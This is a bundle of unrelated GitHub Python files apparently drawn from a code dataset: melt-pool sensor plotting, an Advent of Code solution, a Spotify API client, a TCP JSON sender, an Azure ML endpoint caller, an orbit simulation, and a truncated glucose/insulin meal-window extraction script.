selection[3]:\n # show images at their x & y positions with their intensity\n fig, ax = plt.subplots()\n ax.scatter(df_camera[\"x_mm\"], df_camera[\"y_mm\"],c=df_camera[\"intensity\"],\n cmap=\"inferno\")\n ax.set_title(\"CMOS image position with image intensity: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n ax.set_xlabel(\"x position [mm] in machine coordinates\")\n ax.set_ylabel(\"y position [mm] in machine coordinates\")\n spacing=1\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax.xaxis.set_minor_locator(x_grid_locator)\n ax.yaxis.set_minor_locator(y_grid_locator)\n ax.grid(True,which='minor')\n ax.axes.set_aspect('equal')\n plt.show()\n if selection[4]:\n # show images at their x & y positions with ON / OFF detection\n fig, ax = plt.subplots()\n df_camera_ON = df_camera.loc[df_camera['ON_OFF'] == 1.0]\n df_camera_OFF = df_camera.loc[df_camera['ON_OFF'] == 0.0]\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.scatter(df_camera_ON[\"x_mm\"], df_camera_ON[\"y_mm\"], c=\"darkorange\", \n alpha=0.5, label=\"ON\")\n ax.scatter(df_camera_OFF[\"x_mm\"], df_camera_OFF[\"y_mm\"], c=\"slategray\",\n alpha=0.5, label=\"OFF\")\n ax.legend()\n ax.set_title(\"CMOS image position with ON/OFF detection: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n ax.set_xlabel(\"x position [mm] in machine coordinates\")\n ax.set_ylabel(\"y position [mm] in machine coordinates\")\n spacing=1\n x_grid_locator = MultipleLocator(spacing)\n y_grid_locator = MultipleLocator(spacing)\n ax.xaxis.set_minor_locator(x_grid_locator)\n ax.yaxis.set_minor_locator(y_grid_locator)\n ax.grid(True,which='minor')\n ax.axes.set_aspect('equal')\n plt.show()\n\n if selection[5]:\n # plot vector length(camera delta) vs. slope as scatterplot\n fig,ax = plt.subplots()\n \n # calculate the average slope\n slope_total=0\n weight_total=0\n for index, slope in enumerate(results[\"slopes\"]):\n weight = results[\"camera_delta\"][index]\n slope_weighted = slope * weight\n slope_total+=slope_weighted\n weight_total+=weight\n slope_average=slope_total/weight_total\n # compute theoretical errors for each camera delta\n camera_delta_all = range(int(min(results[\"camera_delta\"])), \n int(max(results[\"camera_delta\"]))+1, 1)\n vector_error_all = []\n for camera_delta in camera_delta_all:\n pyro_delta=slope*camera_delta\n vector_error_all.append(slope_error(camera_delta,pyro_delta))\n # add errorbars to plot\n ax.errorbar(camera_delta_all,\n np.full(len(camera_delta_all), slope_average),\n yerr=vector_error_all,c=\"orange\",label=\"theoretical errors\",\n fmt='none',capsize=4,zorder=1)\n # add data points to the plot\n ax.scatter(results[\"camera_delta\"],results[\"slopes\"], c=\"navy\",\n label=\"scan vectors\",zorder=3)\n # show average slope value\n ax.axhline(slope_average,color=\"orange\",label=\"average scaling factor\",\n linestyle=\"--\",zorder=2)\n ax.set_xlabel(\"vector length [CMOS images]\")\n ax.set_ylabel(\"Scaling factor [pyrometer data points / CMOS image]\")\n ax.legend()\n ax.set_title(\"Evaluation of scan vector scaling: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n\n if selection[6]:\n # plot melt pool area vs. 
pyrometer value\n        fig,ax = plt.subplots()\n        x = df_camera['meltpool_area']\n        y = df_camera['pyro_value']\n        ax.scatter(x,y)\n        ax.set_xlabel(\"meltpool area\")\n        ax.set_ylabel(\"pyrometer value\")\n        ax.legend()\n        plt.show()\n\n    if selection[7]:\n        # plot CMOS 2D and pyro-value 2D in adjacent plots\n        fig,(ax1,ax2) = plt.subplots(1,2)\n        ax1.scatter(df_camera[\"x_mm\"], df_camera[\"y_mm\"], c=df_camera[\"intensity\"],\n            cmap=\"inferno\")\n        ax1.set_title(\"CMOS images intensity @ position\")\n        ax1.set_xlabel(\"x position [mm] in machine coordinates\")\n        ax1.set_ylabel(\"y position [mm] in machine coordinates\")\n        x,y = bit2mm(df_pyro[\"x\"], df_pyro[\"y\"])\n        ax2.scatter(x,y, c = df_pyro[\"intensity\"],\n            cmap=\"inferno\")\n        ax2.set_title(\"Pyrometer measurements @ position\")\n        ax2.set_xlabel(\"x position [mm] in machine coordinates\")\n        ax2.set_ylabel(\"y position [mm] in machine coordinates\")\n        spacing=1\n        x_grid_locator = MultipleLocator(spacing)\n        y_grid_locator = MultipleLocator(spacing)\n        ax1.xaxis.set_minor_locator(x_grid_locator)\n        ax1.yaxis.set_minor_locator(y_grid_locator)\n        ax1.grid(True,which='minor')\n        ax1.axes.set_aspect('equal')\n        x_grid_locator = MultipleLocator(spacing)\n        y_grid_locator = MultipleLocator(spacing)\n        ax2.xaxis.set_minor_locator(x_grid_locator)\n        ax2.yaxis.set_minor_locator(y_grid_locator)\n        ax2.grid(True,which='minor')\n        ax2.axes.set_aspect('equal')\n        plt.show()\n\ndef display_image(image):\n    \"\"\"\n    Display an image. This is a helper function meant for debugging.\n    \"\"\"\n    pylab.imshow(image, cmap=\"Greys_r\", vmin=0, vmax=255)\n    pylab.show()\n\ndef area_image(image, threshold):\n    \"\"\"\n    Convert grayscale image to purely black/white according to the threshold.\n    \"\"\"\n    image[image<threshold] = 0\n    image[image>=threshold] = 1\n    # compute a melt pool image based on the area calculation\n    converted_image = image* 255\n    return(converted_image)\n\ndef normalized_image(image, maximum):\n    \"\"\"\n    Normalize a grey scale image with a maximum value.\n    \"\"\"\n    multiplicator = 255 / maximum\n    out_image = np.round(image * multiplicator).astype(np.uint8)\n    return(out_image)\n\ndef bit2mm(x, y, fieldsize=600, sl2=True):\n    \"\"\"\n    Transform two arrays x,y of distance data from bit to mm\n    \"\"\"\n    x_mm = x\n    y_mm = y\n\n    if sl2:\n\n        scaling = (float(fieldsize) / 2.0) / 524287.0  # The scaling according to the protocol (20 bits, signed).\n\n        x_mm = - x * scaling\n        y_mm = y * scaling\n\n    else:\n\n        scaling = float(fieldsize) / 32768.0  # The scaling according to the protocol (16 bits, signed).\n\n        x_mm = - (x + 16384) * scaling\n        y_mm = (y + 16384) * scaling\n\n    return (x_mm, y_mm)\n\ndef load_processed(file: str):\n    \"\"\"\n    Check if a file has already been processed before and return a Dataframe if\n    that is the case.\n    \"\"\"\n    # handle CMOS data files\n    if file.endswith('.mkv'):\n        try:\n            df = pandas.read_pickle(file.replace('.mkv','.pkl'))\n            return(True, df)\n        except FileNotFoundError:\n            return(False, pandas.DataFrame())\n    # handle pyrometer data files\n    elif file.endswith('.pcd'):\n        try:\n            df = pandas.read_pickle(file.replace('.pcd','.pkl'))\n            return(True, df)\n        except FileNotFoundError:\n            return(False, pandas.DataFrame())\n    else:\n        raise FileNotFoundError\n\n\ndef main():\n    if cherrypick:\n        file_list = create_file_list(job_name, cherry=cherry)\n    else:\n        file_list = create_file_list(job_name)\n    for file in file_list:\n        # Fetch and process pyro data from the .pcd file\n        preexists, pyro1_df = load_processed(file['filename_pyro1'])\n        if not preexists:\n            if verbal == True:\n                print(\"Started processing: 
\" + file['filename_pyro1'])\n tstart = time.time()\n pyro1_df = process_pcd(file)\n if verbal:\n print(\"Process finished in {0} seconds\".format(time.time()-tstart))\n\n # Fetch and process images form the .mkv file\n preexists, image_df = load_processed(file['filename_camera'])\n if not preexists:\n if verbal == True:\n print(\"Started processing: \" + file['filename_camera'])\n tstart = time.time()\n image_df = process_mkv(file)\n if verbal:\n print(\"Process finished in {0} seconds\".format(time.time()-tstart))\n\n\n # fit pyro & CMOS data\n image_df,pyro1_df,results = extend_CMOS_data(image_df, pyro1_df)\n # store image dataframe with correlated coordinates\n filename_pkl = file['filename_camera'].replace(\".mkv\",\".pkl\")\n image_df.to_pickle(filename_pkl)\n # todo: store results to access later if required.\n # plot results\n plot_data(image_df,pyro1_df,results, visual)\n\nif __name__ == \"__main__\":\n main()","repo_name":"makraft/CMOS_processor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1591994497","text":"# AOC 2019 - Day 3\n# tags: #set #direction\n\nimport time\n\nIN_File = \"AOC2019/03.txt\"\nDIRS = {'U':[-1,0],'R':[0,1],'D':[1,0],'L':[0,-1]}\n\ndef parse():\n with open(IN_File) as f:\n out = f.read().split('\\n')\n lines = [[],[]]\n for idx,wire in enumerate(out):\n x,y = 0,0\n for dir in wire.split(','):\n d,m = dir[0],int(dir[1:])\n for pnt in range(1,m+1):\n x += DIRS[d][0]\n y += DIRS[d][1]\n lines[idx].append(tuple([x,y]))\n\n return lines\n\n\ndef part1(data): # 1519\n intersection_distance = 999999\n intersections = list(set(data[0]) & set(data[1]))\n\n for a in intersections:\n distance = abs(a[0]) + abs(a[1])\n intersection_distance = min([intersection_distance,distance])\n\n return intersection_distance\n\ndef part2(data): # 14358\n intersections = list(set(data[0]) & set(data[1]))\n shortest_steps = 999999\n\n for x in intersections:\n distance = data[0].index(x) + data[1].index(x)\n shortest_steps = min([shortest_steps,distance])\n\n return shortest_steps + 2\n\nif __name__ == \"__main__\":\n timestart = time.time()\n\n data = parse()\n\n print(\"part 1:\",part1(data))\n print(\"part 2:\",part2(data))\n\n timeend = time.time()\n print(\"Execution time: \", \"{:.4f}\".format(round(timeend-timestart,7)))","repo_name":"n7tms/AOC","sub_path":"AOC2019/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27333360274","text":"# import requests\nimport requests\nfrom dotenv import load_dotenv\nimport json\nimport os\nimport base64\nimport datetime\nfrom urllib.parse import urlencode\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom fastapi.responses import RedirectResponse\nfrom application import config\n\nload_dotenv()\n\napp = FastAPI()\nsettings = config.get_settings()\n\n@app.get(\"/home\")\ndef homepage():\n return {\"hello\": \"world\"}\n\nclient_id = os.getenv(\"CLIENT_ID\")\nclient_secret = os.getenv(\"CLIENT_SECRET\")\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\ntemplates = Jinja2Templates(directory=\"templates\")\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_item(request: 
Request):\n    return templates.TemplateResponse(\"home.html\", {\"request\": request})\n\n@app.get(\"/typer\")\nasync def redirect_typer():\n    return RedirectResponse(\"https://typer.tiangolo.com\")\n\n    \nclass SpotifyAPI(object):\n    access_token = None\n    access_token_expires = datetime.datetime.now()\n    access_token_did_expire = True\n    client_id = None\n    client_secret = None\n    token_url = \"https://accounts.spotify.com/api/token\"\n\n    \n    def __init__(self, client_id, client_secret, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.client_id = client_id\n        self.client_secret = client_secret\n\n    def get_client_credentials(self):\n        \"\"\"\n        Returns a base64 encoded string\n        \"\"\"\n        client_id = self.client_id\n        client_secret = self.client_secret\n        if client_secret == None or client_id == None:\n            raise Exception(\"You must set client_id and client_secret\")\n        client_creds = f\"{client_id}:{client_secret}\"\n        client_creds_b64 = base64.b64encode(client_creds.encode())\n        return client_creds_b64.decode()\n    \n    def get_token_headers(self):\n        client_creds_b64 = self.get_client_credentials()\n        return {\n            \"Authorization\": f\"Basic {client_creds_b64}\",\n            \"Content-Type\": \"application/x-www-form-urlencoded\"\n        }\n    \n    def get_token_data(self):\n        return {\n            \"grant_type\": \"client_credentials\"\n        }\n    \n    def perform_auth(self):\n        token_url = self.token_url\n        token_data = self.get_token_data()\n        token_headers = self.get_token_headers()\n        r = requests.post(token_url, data=token_data, headers=token_headers)\n        if r.status_code not in range(200, 299):\n            raise Exception(\"Could not authenticate client.\")\n        data = r.json()\n        now = datetime.datetime.now()\n        access_token = data['access_token']\n        expires_in = data['expires_in'] # seconds\n        expires = now + datetime.timedelta(seconds=expires_in)\n        self.access_token = access_token\n        self.access_token_expires = expires\n        self.access_token_did_expire = expires < now\n        return True\n    \n    def get_access_token(self):\n        token = self.access_token\n        expires = self.access_token_expires\n        now = datetime.datetime.now()\n        if expires < now:\n            self.perform_auth()\n            return self.get_access_token()\n        elif token == None:\n            self.perform_auth()\n            return self.get_access_token()\n        return token\n    \n    def get_resource_header(self):\n        access_token = self.get_access_token()\n        headers = {\n            \"Authorization\": f\"Bearer {access_token}\"\n        }\n        return headers\n    \n    def get_resource(self, lookup_id, resource_type='albums', version='v1'):\n        endpoint = f\"https://api.spotify.com/{version}/{resource_type}/{lookup_id}\"\n        headers = self.get_resource_header()\n        r = requests.get(endpoint, headers=headers)\n        if r.status_code not in range(200, 299):\n            return {}\n        return r.json()\n    \n    \n    def get_artist(self, _id):\n        return self.get_resource(_id, resource_type=\"artists\") \n    \n    def base_search(self, query_params):\n        headers = self.get_resource_header()\n        endpoint = \"https://api.spotify.com/v1/search\"\n        lookup_url = f\"{endpoint}?{query_params}\"\n        print(lookup_url)\n        r = requests.get(lookup_url, headers=headers)\n        print(r.status_code)\n        if r.status_code not in range(200, 299):\n            return {}\n        return r.json()\n    \n    def search(self, query=None, search_type=\"artists\"):\n        if query == None:\n            raise Exception(\"A query is required\")\n        if isinstance(query, dict):\n            query = \" \".join([f\"{k}:{v}\" for k, v in query.items()])\n        query_params = urlencode({\"q\": query , \"type\": search_type.lower()})\n        print(query_params)\n        return self.base_search(query_params)\n\n    \n\nspotify = SpotifyAPI(client_id, 
client_secret) \n#print(spotify.perform_auth())\nprint(spotify.get_access_token())\n#print(spotify.search(\"Time\", search_type=\"Track\"))\n#print(spotify.get_artist(\"0TnOYISbd1XYRBk9myaseg\"))\n#access_token = spotify.access_token\n#print(access_token)\n#print(spotify.search({\"track\": \"Time\"}, search_type=\"track\"))\n\n\n\n\n\n\n","repo_name":"honeysaxena/metrics","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10627478535","text":"\n import socket \nimport json\nimport time\n\nsettings = {\n    'host': '127.0.0.1',\n    'port': 9091\n}\n\ndata = {\n    'category': 'Test',\n    'name': \"Henrique Yukio Murata\",\n    'counter': 1\n}\n\ndef create_tcp_connection():\n    try:\n        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        client_socket.connect((settings['host'], settings['port']))\n        print(f'Connected to {settings[\"host\"]}:{settings[\"port\"]}')\n        return client_socket\n    except socket.error as e:\n        print(f'Failed to connect to {settings[\"host\"]}:{settings[\"port\"]}')\n        print(e)\n        return None\n\ndef sendData(client_socket):\n    try:\n        json_data = json.dumps(data)\n        encoded_json = (json_data+'\\n').encode('utf-8')\n        client_socket.send(encoded_json)\n        print('JSON sent over TCP successfully')\n        data['counter'] = data['counter'] + 1\n        time.sleep(5)\n        \n    except socket.error as e:\n        print('Failed to send JSON over TCP')\n        print(e)\n        client_socket.close()\n        create_tcp_connection()\n        \nclient_socket = None\nclient_socket = create_tcp_connection()\nwhile True:\n    sendData(client_socket)\n\n\n\n","repo_name":"HeyYukio/TCP-Json","sub_path":"SendJsonDummy.py","file_name":"SendJsonDummy.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20671881985","text":"from promptflow import tool\nimport urllib.request\nimport json\nimport os\nimport ssl\n\ndef allowSelfSignedHttps(allowed):\n    # bypass the server certificate verification on client side\n    if allowed and not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None):\n        ssl._create_default_https_context = ssl._create_unverified_context\n\nallowSelfSignedHttps(True) # this line is needed if you use self-signed certificate in your scoring service.\n\n\n@tool\ndef my_python_tool(short_description: str, headline: str) -> str:\n    \n\n    data = {\"inputs\": {\"input_signature1\": [short_description], \"input_signature2\":[headline] }}\n\n    body = str.encode(json.dumps(data))\n\n    ##### IMPORTANT: Replace this with the URL for your endpoint #####\n    url = 'https://endpoint.westeurope.inference.ml.azure.com/score'\n\n    # Replace this with the primary/secondary key or AMLToken for the endpoint\n    api_key = '111111111111111111111111111111111'\n    if not api_key:\n        raise Exception(\"A key should be provided to invoke the endpoint\")\n\n    ### IMPORTANT: Replace 'fine-tuned-bert-news-classific-1' with the name of your model deployment ###\n    headers = {'Content-Type':'application/json', 'Authorization':('Bearer '+ api_key), 'azureml-model-deployment': 'fine-tuned-bert-news-classific-1' }\n\n    req = urllib.request.Request(url, body, headers)\n\n    try:\n        response = urllib.request.urlopen(req)\n\n        result = json.loads(response.read().decode(\"utf8\", 'ignore'))[0][\"0\"]\n        print(result)\n    except urllib.error.HTTPError as error:\n        print(\"The request failed with status code: \" + 
str(error.code))\n\n print(error.info())\n print(error.read().decode(\"utf8\", 'ignore'))\n result = error.read().decode(\"utf8\", 'ignore')\n\n return result\n","repo_name":"samelhousseini/building_and_refining_llm_solutions","sub_path":"News Classification Flow/bert_fine_tuned.py","file_name":"bert_fine_tuned.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73121964967","text":"# %%\nfrom scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport math\n\n# This is an example of using Python calculate and plot the motion of a a mass\n# orbiting another in a central force field.\n# Order of variables in the array u[]:\n# 0: r\n# 1: v_r\n# 2: phi\n# Written by Robert P. Johnson\n\n# Parameters describing the system.\nk = 1.0 # force constant\nMass = 2.0 # first mass\nmass = 1.0 # second mass\nmu = Mass * mass / (Mass + mass) # reduced mass\nalpha = -0.1\n\n# Define the central force function\ndef F(r):\n return -(1.0 + alpha) * k / pow(r, 2.0 + alpha)\n\n\ndef U(r):\n return -k / pow(r, 1.0 + alpha)\n\n\n# Assign initial conditions to the motion.\nr0 = 4.0\nrdot0 = 0.0\nphi0 = 0.0\nLc = math.sqrt(\n mu * pow(r0, 1.0 - alpha) * (1.0 + alpha) * k\n) # Angular momentum for a circular orbit\nL = 0.5 * Lc # Conserved angular momentum\nu0 = [r0, rdot0, phi0] # initial conditions for all 3 variables\n\n# This function gives the time derivative of each of the 3 variables. These follow from the Lagrange equations of motion,\n# taking into account the fact that phi is ignorable, so that pphi=L is constant.\ndef dudt(u, t):\n r = [0.0, 0.0, 0.0]\n r[0] = u[1]\n r[1] = L * L / (mu * mu * pow(u[0], 3)) + F(u[0]) / mu\n r[2] = L / (mu * u[0] * u[0])\n return r\n\n\ndef h(u):\n return 0.5 * mu * u[1] * u[1] + L * L / (2.0 * mu * u[0] * u[0]) + U(u[0])\n\n\n# Use the scipy odeint routine to carry out the numerical integration of the system of equations.\nt0 = 0.0 # start time\nt1 = 100.0 # end time\nN = 1600 # number of time steps\n\n# Choose a set of time values at which to evaluate the solution y(t)\nt = np.arange(t0, t1, (t1 - t0) / N)\n\n# Call the routing from scipy that does the integration\nu = odeint(dudt, u0, t)\n\nEinitial = h(u0)\nEfinal = h(u[N - 1, ...])\nprint(\"Integration of two-body central force orbits.\")\nprint(\"The potential goes as -1/r^n with n= \" + str(1 + alpha))\nprint(\"The masses are \" + str(Mass) + \" and \" + str(mass))\nprint(\"The initial radius is \" + str(r0))\nprint(\"The initial radial velocity is \" + str(rdot0))\nprint(\"The initial phi angle is \" + str(phi0))\nprint(\"The conserved angular momentum is \" + str(L))\nprint(\"The angular momentum for a circular orbit would be \" + str(Lc))\nprint(str(N) + \" time steps will be taken from time \" + str(t0) + \" to time \" + str(t1))\nprint(\"The initial energy is \" + str(Einitial))\nprint(\"The final energy is \" + str(Efinal))\n\nfont = {\"size\": 18}\nplt.rc(\"font\", **font)\n\n# Use pyplot from matplotlib to plot the relative trajectory\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\nax.set_rlabel_position(-22.5)\nax.plot(u[..., 2], u[..., 0])\nax.set_rmax(1.1 * r0)\nplt.tight_layout()\nplt.title(\"Relative Trajectory\")\nplt.show()\n\n# Plot the individual orbits\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\nax.plot(u[..., 2], (Mass / (Mass + mass)) * u[..., 0])\nax.plot(u[..., 
2] + math.pi, (mass / (Mass + mass)) * u[..., 0])\nax.set_rmax(1.1 * r0)\nplt.title(\"Individual Orbits\")\nplt.show()\n\n# Now use matplotlib to make an animation of the motion\nfig = plt.figure(figsize=(8, 8))\nax = plt.subplot(111, projection=\"polar\")\n(pnt1,) = ax.plot([], [], \"bo\", markersize=12)\n(pnt2,) = ax.plot([], [], \"ro\", markersize=12)\nax.set_rmax(1.1 * r0)\nplt.title(\"Orbit Animation\")\ntime_text = ax.text(0.01, 0.98, \"\", transform=ax.transAxes)\ntime_step = 40.0 * (t1 - t0) / N\n\n\ndef init():\n pnt1.set_data([], [])\n pnt2.set_data([], [])\n time_text.set_text(\"\")\n return pnt1, pnt2, time_text\n\n\ndef animate(i):\n pnt1.set_data(u[i, 2], (Mass / (Mass + mass)) * u[i, 0])\n pnt2.set_data(u[i, 2] + math.pi, (mass / (Mass + mass)) * u[i, 0])\n time = i * time_step\n time_text.set_text(\"time=%.1f ms\" % time)\n return pnt1, pnt2, time_text\n\n\n# The animation is created here\nanim = animation.FuncAnimation(\n fig, animate, init_func=init, frames=N, interval=time_step, blit=False\n)\n\n# Save the animation to an mpeg file. This requires ffmpeg to be installed,\n# with the executable in the PATH\n# This takes a lot of CPU time, so don't do it when it is not needed.\n# anim.save('TimeOrbit.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\n\n# Display the animation\nplt.show()\n# %%\n","repo_name":"Drixitel/Scientific-Computing","sub_path":"physics/mech/orbits.py","file_name":"orbits.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31634632724","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[214]:\n\n\nimport datetime as datetime\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom math import log\n\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt \nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nfrom sklearn.cluster import DBSCAN \nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.preprocessing import normalize\nfrom sklearn.metrics import confusion_matrix\nfrom scipy.stats import entropy\n#from scipy.special import entr\nfrom sklearn.decomposition import PCA \nfrom scipy.stats import entropy\n\n\ncgm_data = pd.read_csv('CGMData.csv')\ncgm_data2 = pd.read_csv('CGMData670GPatient2.csv')\n\ncgm_data.columns = [c.replace(' ', '_') for c in cgm_data.columns]\ncgm_data2.columns = [c.replace(' ', '_') for c in cgm_data2.columns]\n\ncgm = cgm_data[[\"Date\", \"Time\", \"Sensor_Glucose_(mg/dL)\"]]\ncgm2 = cgm_data2[[\"Date\", \"Time\", \"Sensor_Glucose_(mg/dL)\"]]\n\ncgm[\"Time\"] = cgm[\"Date\"] + ' ' + cgm[\"Time\"]\ncgm2[\"Time\"] = cgm2[\"Date\"] + ' ' + cgm2[\"Time\"]\n\ncgm[\"Time\"] = cgm[\"Time\"].astype(\"datetime64[ns]\")\ncgm = cgm[['Time', 'Sensor_Glucose_(mg/dL)']]\n\ncgm2[\"Time\"] = cgm2[\"Time\"].astype(\"datetime64[ns]\")\ncgm2 = cgm2[[\"Time\", \"Sensor_Glucose_(mg/dL)\"]]\n\ncgm = cgm.set_index(\"Time\")\ncgm2 = cgm2.set_index(\"Time\")\n\ncgm = cgm.iloc[::-1]\ncgm2 = cgm2.iloc[::-1]\n\n\n# In[215]:\n\n\ninsulin_data = pd.read_csv(\"InsulinData.csv\")\ninsulin_data2 = pd.read_csv(\"InsulinAndMealIntake670GPatient3.csv\")\n\ninsulin_data.columns = [c.replace(' ', '_') for c in insulin_data.columns]\ninsulin_data2.columns = [c.replace(' ', '_') for c in insulin_data2.columns]\n\ninsulin = insulin_data[[\"Date\", \"Time\", \"BWZ_Carb_Input_(grams)\"]]\ninsulin2 = insulin_data2[[\"Date\", \"Time\", 
\"BWZ_Carb_Input_(grams)\"]]\n\ninsulin[\"Time\"] = insulin[\"Date\"] + ' ' + insulin[\"Time\"]\ninsulin2[\"Time\"] = insulin2[\"Date\"] + ' ' + insulin2[\"Time\"]\n\ninsulin[\"Time\"] = insulin[\"Time\"].astype(\"datetime64[ns]\")\ninsulin2[\"Time\"] = insulin2[\"Time\"].astype(\"datetime64[ns]\")\n\ninsulin = insulin[[\"Time\", \"BWZ_Carb_Input_(grams)\"]]\ninsulin2 = insulin2[[\"Time\", \"BWZ_Carb_Input_(grams)\"]]\n#print(insulin.head(50))\n\ninsulin = insulin.set_index(\"Time\")\ninsulin2 = insulin2.set_index(\"Time\")\n\ninsulin.columns = ['data']\ninsulin2.columns = ['data']\n\ninsulin = insulin.iloc[::-1]\ninsulin2 = insulin2.iloc[::-1]\n\n\n\n# In[216]:\n\n\nmeal_Time = pd.DataFrame(columns = ['startTime', 'endTime'])\nnoMeal_Time = pd.DataFrame(columns = ['startTime', 'endTime'])\n\nyValue = pd.DataFrame(columns =['startTime', 'endTime', 'YValue'])\n\n\n# In[217]:\n\n\nif pd.isnull(insulin.iloc[0,0]):\n startTime = insulin.index[0]\n endTime = startTime + pd.offsets.Minute(120)\n curr = pd.DataFrame()\n i = 0\n \n while ((endTime < insulin.index[len(insulin)-1]) & (i < 41434)):\n curr = insulin[(insulin.index >= startTime)]\n curr = curr[(curr.index < endTime)]\n hasMeal = False\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n hasMeal = True\n \n if (hasMeal == False):\n noMeal_Time = noMeal_Time.append({'startTime': startTime, 'endTime': endTime}, ignore_index=True)\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n \n elif (hasMeal == True):\n mealNext = True\n while ((mealNext == True) & (endTime < insulin.index[len(insulin)-1])):\n mealNext = False\n for j in range(len(curr)):\n if ((pd.notnull(curr.iloc[j,0])) and (curr.iloc[j,0] != 0)):\n startTime = curr.index[j]\n startMThirty = startTime - pd.offsets.Minute(30)\n endTime = startTime + pd.offsets.Minute(120)\n y_Val = curr.iloc[j,0]\n\n curr = insulin[(insulin.index > startTime)]\n curr = curr[(curr.index < endTime)]\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n mealNext = True\n #meal_Time = meal_Time.append({'startTime': startMThirty, 'endTime': endTime}, ignore_index=True)\n yValue = yValue.append({'startTime': startMThirty, 'endTime': endTime, 'YValue': y_Val}, ignore_index=True)\n i = i + 1\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n\n\n# In[218]:\n\n\n#print(yValue)\nmeal_Time2 = pd.DataFrame(columns = ['startTime', 'endTime'])\nnoMeal_Time2 = pd.DataFrame(columns = ['startTime', 'endTime'])\nyValue2 = pd.DataFrame(columns =['startTime', 'endTime', 'YValue'])\n\n\n# In[219]:\n\n\nif pd.isnull(insulin2.iloc[0,0]):\n startTime = insulin2.index[0]\n endTime = startTime + pd.offsets.Minute(120)\n curr = pd.DataFrame()\n i = 0\n \n while ((endTime < insulin2.index[len(insulin2)-1]) & (i < 41434)):\n curr = insulin2[(insulin2.index >= startTime)]\n curr = curr[(curr.index < endTime)]\n hasMeal = False\n \n if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n hasMeal = True\n \n if (hasMeal == False):\n noMeal_Time2 = noMeal_Time2.append({'startTime': startTime, 'endTime': endTime}, ignore_index=True)\n startTime = endTime\n endTime = startTime + pd.offsets.Minute(120)\n \n elif (hasMeal == True):\n mealNext = True\n while ((mealNext == True) & (endTime < insulin2.index[len(insulin2)-1])):\n mealNext = False\n for j in range(len(curr)):\n if ((pd.notnull(curr.iloc[j,0])) and (curr.iloc[j,0] != 0)):\n startTime = curr.index[j]\n startMThirty = startTime - pd.offsets.Minute(30)\n endTime = startTime + pd.offsets.Minute(120)\n 
y_Val2 = curr.iloc[j,0]\n                        curr = insulin2[(insulin2.index > startTime)]\n                        curr = curr[(curr.index < endTime)]\n                        \n                        if ((pd.notnull(curr['data'])) & (curr['data'] != 0)).any():\n                            mealNext = True\n                        #meal_Time2 = meal_Time2.append({'startTime': startMThirty, 'endTime': endTime}, ignore_index=True)\n                        yValue2 = yValue2.append({'startTime': startMThirty, 'endTime': endTime, 'YValue': y_Val2}, ignore_index=True)\n\n            i = i + 1\n            startTime = endTime\n            endTime = startTime + pd.offsets.Minute(120)\n\n\n# In[220]:\n\n\n\nmeal_Sensor = pd.DataFrame()\nnoMeal_Sensor = pd.DataFrame()\n\n\n# In[221]:\n\n\ny_val = []\nfor i in range(0, yValue.index[len(yValue)-1]):\n    startTime = yValue.iloc[i,0]\n    endTime = yValue.iloc[i,1]\n    yval = yValue.iloc[i,2]\n    y_val.append(yval)\n    \n    curr = pd.DataFrame()\n    curr = cgm[(cgm.index < endTime)]\n    curr = curr[(curr.index >= startTime)]\n    curr = curr.reset_index(drop=True)\n    curr = curr.T\n    meal_Sensor = pd.concat([meal_Sensor, curr], ignore_index=True)\n    \nyval = pd.DataFrame()\nyval['31'] = y_val\n\n\n# In[222]:\n\n\nmeal_Sensor = pd.concat([meal_Sensor, yval], axis=1)\n\n\n# In[223]:\n\n\ny_val2 = []\n\nfor i in range(0, yValue2.index[len(meal_Time2)-1]):\n    startTime = yValue2.iloc[i,0]\n    endTime = yValue2.iloc[i,1]\n    yval2 = yValue2.iloc[i,2]\n    y_val2.append(yval2)\n    \n    curr = pd.DataFrame()\n    curr = cgm2[(cgm2.index < endTime)]\n    curr = curr[(curr.index >= startTime)]\n    curr 